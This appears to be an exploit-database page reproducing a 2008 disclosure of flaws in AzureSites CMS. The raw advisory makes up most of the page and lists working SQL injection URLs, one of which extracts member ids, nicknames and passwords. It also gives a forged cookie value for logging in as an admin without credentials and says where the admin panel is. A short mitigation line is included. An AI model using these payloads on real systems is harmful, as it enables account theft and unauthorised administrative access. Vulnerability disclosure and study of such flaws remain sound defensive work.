AzureSites CMS - Multiple Vulnerabilities

vendor:

AzureSites CMS

by:

Lidloses_Auge

7.5

CVSS

HIGH

SQL Injection, Insecure Cookie Handling

89, 614

CWE

Product Name: AzureSites CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

AzureSites CMS – Multiple Vulnerabilities

AzureSites CMS is vulnerable to multiple vulnerabilities, including SQL Injection and Insecure Cookie Handling. The count of columns for the SQL Injection could be different, and some of them are Blind Injections. For the Insecure Cookie Handling, the ID depends on the UserID, and the Admin Panel can be found at [Target]/azureadmin/index.php.

Mitigation:

Ensure that user input is properly sanitized and validated, and that cookies are properly secured.

Source

Exploit-DB raw data:

###############################################################
#
#        AzureSites CMS - Multiple Vulnerabilities
#
#   Vulnerabilities discovered by: Lidloses_Auge
#   Greetz to:                     -=Player=- , Suicide, g4ms3, enco,
#                                  GPM, Free-Hack, Ciphercrew, h4ck-y0u
#   Date:                          26.05.2008
#
###############################################################
#
#   Vulnerabilities:
#
#   1.) SQL Injection
#
#      1.1.) [Target]/index.php?page=null'union+select+1,2,3,4,5,concat_ws(0x202d20,id,nickname,password),7,8+from+members/*
#      1.2.) [Target]/index.php?page=null&lang=null'union+select+1,2,3,4,5,6,7,8/*
#      1.3.) [Target]/index.php?action=view_item&view_id=429&id_cat=null+union+select+1,2,3,4,5,6,7,8/*
#      1.4.) [Target]/index.php?action=view_item&view_id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
#
#   2.) Insecure Cookie Handling
#
#      2.1.) Cookie: loggedin=1; ID=1
#
#   Notes:
#
#      SQL Injection:
#
#         The count of columns could be different. It depends on the injection. Some of them are Blind Injections.
#
#      Insecure Cookie Handling:
#
#         Use "Live HTTP Headers" to change the Cookie Value in the Header.
#         The ID depends on the UserID, you want to login with.
#         Admin Panel can be found at: [Target]/azureadmin/index.php
#
###############################################################

# milw0rm.com [2008-05-31]